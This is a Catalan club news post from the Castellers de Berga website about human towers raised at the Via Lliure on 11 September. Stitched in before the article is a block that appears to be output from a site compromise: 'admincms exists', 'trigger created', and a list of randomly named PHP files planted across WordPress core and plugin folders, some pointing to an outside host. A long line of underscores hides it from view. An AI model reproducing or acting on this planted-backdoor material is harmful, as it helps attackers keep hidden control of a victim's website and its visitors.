Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/install-helper-ajax-core-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/options-meta-stream-core-meta-stream-ajax-response-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/install-helper-ajax-core-ajax-ajax-response-core-cron-ajax-response-stream.php https://castellersdeberga.cat/wp-content/plugins/qode-instagram-widget/qode-instagram-feed-meta-stream-meta-cron-meta-private.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/layerslider-stream-meta-core-private-wp-ajax.php https://castellersdeberga.cat/wp-includes/block-supports/dimensions-cron-private.php https://castellersdeberga.cat/wp-includes/blocks/query-no-results-meta-wp.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Castells a la Via Lliure
 

Castells a la Via Lliure


Castells a la Via LliureDivendres 11 de setembre, vam fer una actuació molt especial a la Via Lliure. En una Avinguda Meridiana plena a vessar, hi vam alçar diverses construccions. Els Castellers de Berga vam ser al tram 35, amb majoria de gent de tota la comarca del Berguedà. A l’escenari que hi havia entre els trams 35 i 36 hi van actuar Koloraines i Brams. Entre aquestes dues formacions vam alçar els nostres castells: fins a 6 pilars de 4 en diverses rondes, juntament amb al 3 de 7, el 4 de 7 i el 4 de 6 amb el pilar. Ja que hi érem no ens hi vam posar per poc. Amb els dos castells de 7 descarregats a la Meridiana, arribem a les 93 aletes a castells de 7 des que el 18 de maig de 2013 vam descarregar el nostre primer castell de 7. L’objectiu és arribar al centenar aquesta mateixa temporada. L’actuació a la Meridiana va ser una de les que hi ha hagut més públic, juntament amb la manifestació de l’11 de setembre de 2014, a la V humana que va omplir la Diagonal i la Gran Via.
Al matí del divendres 11, també vam participar a l’ofrena floral a Rafael Casanova, organitzada per l’Ajuntament de Berga, juntament amb altres entitats de la ciutat.
Resten tan sols 5 actuacions per finalitzar la temporada. La propera arribarà el dissabte 19 de setembre, a Cardona. Per això els assajos no s’aturen i continuem treballant els dimarts i divendres al vespre, a Cal Cuberas.